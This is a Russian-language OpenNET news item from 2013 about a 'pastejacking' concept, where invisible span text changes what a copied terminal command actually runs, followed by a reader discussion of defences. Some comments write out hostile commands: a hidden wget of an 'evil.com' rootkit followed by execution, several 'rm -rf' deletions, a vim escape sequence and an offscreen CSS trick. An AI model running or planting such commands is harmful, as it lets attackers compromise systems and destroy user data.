The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Концепция атаки по подмене копируемого в терминал текста с сайта

08.04.2013 09:46

Опубликована интересная концепция тривиальной, но эффективной атаки, рассчитанной на излишнее доверие к увиденным при копировании в терминал примерам команд с различных сайтов. Используя невидимый, но помещаемый в буфер обмена при копировании, блок "span", можно вместо невинного текста, организовать выполнение в терминале произвольных команд.

Например, после копирования в окно терминала строки "git clone /dev/null; clear; echo "Hello"
git clone
git://git.kernel.org/pub/scm/utils/kup/kup.git" на самом деле будет выполнена команда "git clone /dev/null; clear; echo Hello" и отображён текст "git clone git://git.kernel.org/pub/scm/utils/kup/kup.git".

  1. Главная ссылка к новости (http://www.reddit.com/r/netsec...)
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/36619-security
Ключевые слова: security
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (62) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, zzzzz (??), 10:12, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    вот это дырень О_О
     
     
  • 2.10, Аноним (-), 11:02, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    http://images.wikia.com/callofduty/ru/images/6/69/%D0%92%D0�
     
     
  • 3.26, Аноним (-), 14:03, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Не беда! Теперь вместо
    выделить(что-то), копировать, вставить
    >>

    выделить(что-то), копировать, вставить,
    +
    выделить(только то, что действительно можно), вставить

    ничетаковерхедпонадобитсяновыямышь

     
     
  • 4.36, pavlinux (ok), 15:06, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать текст цветом бэкграунда. :)
     
     
  • 5.51, 80е (?), 20:41, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать
    > текст цветом бэкграунда. :)

    И без зари, и без заката WWW я отродясь копирую текст сначала в самый тупой из редакторов, чтобы просмотреть его перед переносом в промпт.

     
     
  • 6.65, pavlinux (ok), 05:25, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > я отродясь копирую текст сначала в самый тупой из редакторов,
    > чтобы просмотреть его перед переносом в промпт.

    Да-да-да, конечно-конечно-конечно, мы тебе верим!

     

  • 1.2, Аноним (-), 10:15, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Это скорее недоработка, чем дырень.
    [сообщение отредактировано модератором]
     
     
  • 2.49, 80е (?), 20:37, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    >> Это скорее недоработка, чем дырень.

    Вот именно

     

  • 1.3, Okarin (ok), 10:24, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!
     
     
  • 2.60, MrClon (?), 00:40, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!

    В вики это не сработает, в них как правило HTML юзать не дают, только свою разметку.

     

  • 1.4, Аноним (-), 10:27, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    спасибо за идею :)
     
  • 1.5, Аноним (-), 10:33, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    шикарно же, как это еще раньше не нашли?
     
     
  • 2.50, 80е (?), 20:38, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > шикарно же, как это еще раньше не нашли?

    ты больной? кто там этого «раньше не находил»???

     

  • 1.6, Аноним (-), 10:40, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Видимо, следующее первое апреля будет на редкость удачным. :)
    Ждем появления специальных тем для юзеров, словивших таким образом 'rm -rf $HOME &'.
     
     
  • 2.11, Аноним (-), 11:03, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А при чем тут HTML5? В указанной конструкции нет ни 1 элемента из HTML5 :)
     
     
  • 3.13, Аноним (-), 11:18, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, я про HTML5 и не писал. Да и насколько мне известно, среднестатистический shell пока что кроме bash/csh/ksh скриптов ничего другого не разумеет. Хотя, быть может, наступят те светлые времена, когда HTML-теги можно будет набивать прямо в терминале. А вместо bash будет JavaScript. :)
     
  • 3.15, Аноним (-), 11:22, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    В дополнение:
    <rm path="$HOME" class="noecho"/>
    Я джва года жду такой shell...
     
     
  • 4.61, MrClon (?), 00:46, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > В дополнение:
    > <rm path="$HOME" class="noecho"/>
    > Я джва года жду такой shell...

    class="noecho,force,recursive"

     

  • 1.12, skybon (ok), 11:17, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ну много же всяких, которые тянут любое говно в ближайший терминал без оглядки.
     
  • 1.17, Аноним (-), 11:40, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее убирать и только затем в терминал.
     
     
  • 2.21, zzzzz (??), 13:20, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее
    > убирать и только затем в терминал.

    хоть кто-то так делает? а сколько людей читают новостные сайты? да эта хрень просто бомба. единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.

     
     
  • 3.22, GotF (ok), 13:33, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.

    При чём тут ";"? Ловить надо перевод строки.

     
     
  • 4.23, Аноним (-), 13:55, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    По уму, надо бы просто чтобы невидимый текст никуда не копировался.
     
     
  • 5.30, GotF (ok), 14:20, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > По уму, надо бы просто чтобы невидимый текст никуда не копировался.

    Ну как бы да, но беда в том, что в этих ваших интернетах есть 1001 способ сделать текст невидимым. В общем, всё как обычно сводится к прокладке между креслом и клавиатурой.

     
  • 4.25, cmp (ok), 14:03, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear && git clone git://kernel.org
     
     
  • 5.29, GotF (ok), 14:18, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh &&
    > chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear &&
    > git clone git://kernel.org

    Это всё чудесно, но без '\n' в нужном месте не выполнится :)

     
     
  • 6.38, gegMOPO4 (ok), 16:30, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Ещё \r.
     

  • 1.18, Слакварявод (?), 11:58, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В clipper-е в кедах видно сразу что там в буфер забилось! можно там глядеть, прежде чем вставлять!
     
  • 1.19, 1235235412831 (?), 12:50, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Патч Брамина v.2.0 :D
     
     
  • 2.20, GotF (ok), 12:57, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Патч Брамина v.2.0

    Бармина.

     

  • 1.24, Аноним (-), 13:58, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Теперь всё в блокнот копировать.. (
     
  • 1.27, нимус (?), 14:06, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ну вот, спалили тему...
     
  • 1.28, pavlinux (ok), 14:17, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Ваще-то это дыра в браузерах - то, что копируются не выделенные символы, а хрень какая-то.
     
     
  • 2.32, Клыкастый (ok), 14:25, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +2 +/
    эта милая привычка браузеров выделять не то, что я вижу, а ещё всякую html разметку мне никогда не нравилась.
     
     
  • 3.58, Михрютка (ok), 23:46, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > эта милая привычка браузеров выделять не то, что я вижу, а ещё
    > всякую html разметку мне никогда не нравилась.

    Сусли^WТекст за пределами окна ты тож не видишь. А он есть.

     
  • 2.57, Михрютка (ok), 23:42, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    в CSS

    span style="position: absolute; left: -100px; top: -100px"

    именно выделенные символы и копируются, все по чесноку.

     

  • 1.31, Клыкастый (ok), 14:24, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "вставить как простой текст", энтер жать не сразу, не?
     
     
  • 2.34, angra (ok), 14:34, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    В "простом тексте" уже могут быть переводы строки. Да и вычитывать большой блок вряд ли кто-то станет, особенно после вычитки его в браузере.
     
     
  • 3.35, Клыкастый (ok), 14:39, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    ну тогда - "ой!"

    - вычитываем в vim-е.
    - да и вообще копипастить отучаемся.

    оригинальная "дырка" на самом деле. на 90% - social engineering.

     
     
  • 4.52, Stax (ok), 20:57, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..
     
     
  • 5.53, Клыкастый (ok), 21:45, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..

    уже лучше. и под десяток всего!


     

  • 1.37, Аноним (-), 15:22, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • –6 +/
    Не понимаю сути проблемы. В гну/линукс такой бардак что написать строчку которая заработает у других людей даже в том же дичтрибутиве очень сложно.
    обычно просто нечего копипастить
     
     
  • 2.39, Аноним (-), 17:03, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    rm -rf /usr
     
     
  • 3.41, Аноним (-), 17:17, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    rm -rf /* && init 6
     
     
  • 4.54, Xasd (ok), 22:08, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/



    bash: init: command not found...



     
     
  • 5.62, Аноним (-), 01:12, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    reboot или shutdown -h now
     
     
  • 6.63, Xasd (ok), 03:15, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/


    $ reboot
    bash: reboot: command not found...
    $ shutdown -h now
    bash: shutdown: command not found...


    и даже так (!) :



    $ bash
    bash: bash: command not found...
    $ ls /bin/ /usr/bin/
    ls: cannot access /bin/: No such file or directory
    ls: cannot access /usr/bin/: No such file or directory



     
     
  • 7.66, pavlinux (ok), 05:29, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    >[оверквотинг удален]
    > $ shutdown -h now
    > bash: shutdown: command not found...
    >


    > и даже так (!) :
    >

    $ bash

    > bash: bash: command not found...
    > $ ls /bin/ /usr/bin/
    > ls: cannot access /bin/: No such file or directory
    > ls: cannot access /usr/bin/: No such file or directory
    >

    echo b > /proc/sysrq-trigger

     
  • 2.40, Онононо (?), 17:15, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать на любой ОС где есть доступ к шелу.
     
     
  • 3.42, Аноним (-), 18:02, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
    > на любой ОС где есть доступ к шелу.

    Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe

     
     
  • 4.43, Аноним (-), 18:25, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Для пользователей винды то ли на Баше, то ли ItHappens был описан Формат Улыбки:
    Команда format C:, подтвердить, и после перезагрузки ваш компьютер будет работать гораздо быстрее
     
  • 4.44, Онононо (?), 18:35, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    ты окромя винды больше осей не знаешь?
     
  • 4.46, Аноним (-), 19:16, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Пользователи винды не очень часто знают что такое cmd.exe

    так правильно.

     
     
  • 5.68, Аноним (-), 16:55, 10/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    >> Пользователи винды не очень часто знают что такое cmd.exe
    > так правильно.

    А должны?

     
  • 4.47, Aceler (ok), 19:52, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Когда http://paypal.com/ на самом деле копируется как http://lskdjbsnd.tk/sdefj/sdf/?sdjhasdknb&dfsdf&go=http://paypal.com, при этом по второй ссылке тебе покажут логин пэйпала, а в адресной строке через Javascript будет стоять paypal.com — пользователи венды будут очень недовольны.
     
     
  • 5.64, Xasd (ok), 03:33, 09/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Firefox can't find the server at www.lskdjbsnd.tk.
     
  • 4.56, Харитон (?), 22:22, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    >> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
    >> на любой ОС где есть доступ к шелу.
    > Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe

    как бы сказать  уних такой возможности даже нет...
    вот павершеле...)))
    там и возможности пошире...

     
  • 3.45, Аноним (-), 19:14, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Я про то почти никогда не имеет смысл что-то копипастить с сайтов.
    В прочем url всегда копипастю так что... В общем как страшно жить.
     
  • 3.55, Xasd (ok), 22:10, 08/04/2013 [^] [^^] [^^^] [ответить]  
  • +/
     
     

  • 1.48, mmrnmhrm (?), 20:29, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    реквестирую буфер обмена с программируемой логикой
     
  • 1.59, Михрютка (ok), 23:50, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    постить на опеннете новости с угловыми скобками в тексте - идеальный метод троллинга аудитории.
     
  • 1.67, Аноним (-), 13:15, 09/04/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В urxvt есть плагин confirm-paste, требующий подтверждения при вставке многострочного текста.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру